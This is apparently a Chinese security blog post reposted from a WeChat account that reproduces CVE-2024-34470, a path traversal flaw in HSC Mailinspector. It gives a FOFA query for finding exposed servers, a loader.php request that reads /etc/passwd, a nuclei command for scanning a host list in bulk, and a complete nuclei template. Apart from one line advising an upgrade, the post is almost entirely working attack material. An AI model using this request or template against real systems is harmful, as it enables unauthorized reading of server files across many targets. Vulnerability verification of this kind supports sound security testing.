一:漏洞名称
HSC Mailinspector 任意文件读取漏洞
二:漏洞描述
未经身份验证的用户可以滥用/public/loader.php文件中存在的路径遍历漏洞。path参数无法正确筛选传递的文件和目录是否为webroot的一部分,从而使攻击者能够读取服务器上的任意文件。
三:漏洞影响版本
HSC Mailinspector 5.2.17-3 through 5.2.18
四:网络空间测绘查询
FOFA "mailinspector/public"
五:漏洞复现
/mailinspector/public/loader.php?path=../../../../../../../etc/passwd
目录遍历漏洞允许攻击者在目标系统上遍历目录结构并访问其它目录中的文件。这种漏洞通常由于应用程序对用户输入的路径没有进行适当的验证或限制而产生。
nuclei.exe -t CVE-2024-34470.yaml -l host.txt
建议更新当前系统或软件至最新版,完成漏洞的修复。
批量验证脚本
id: CVE-2024-34470 info: name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion author: topscoder severity: high description: | An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. http: - method: GET path: - "{{BaseURL}}/mailinspector/login.php" host-redirects: true matchers: - type: word part: body words: - "Licensed to HSC TREINAMENTO" - method: GET path: - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd" matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:" - type: status status: - 200
原文始发于微信公众号(Adler学安全):漏洞复现-CVE-2024-34470
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论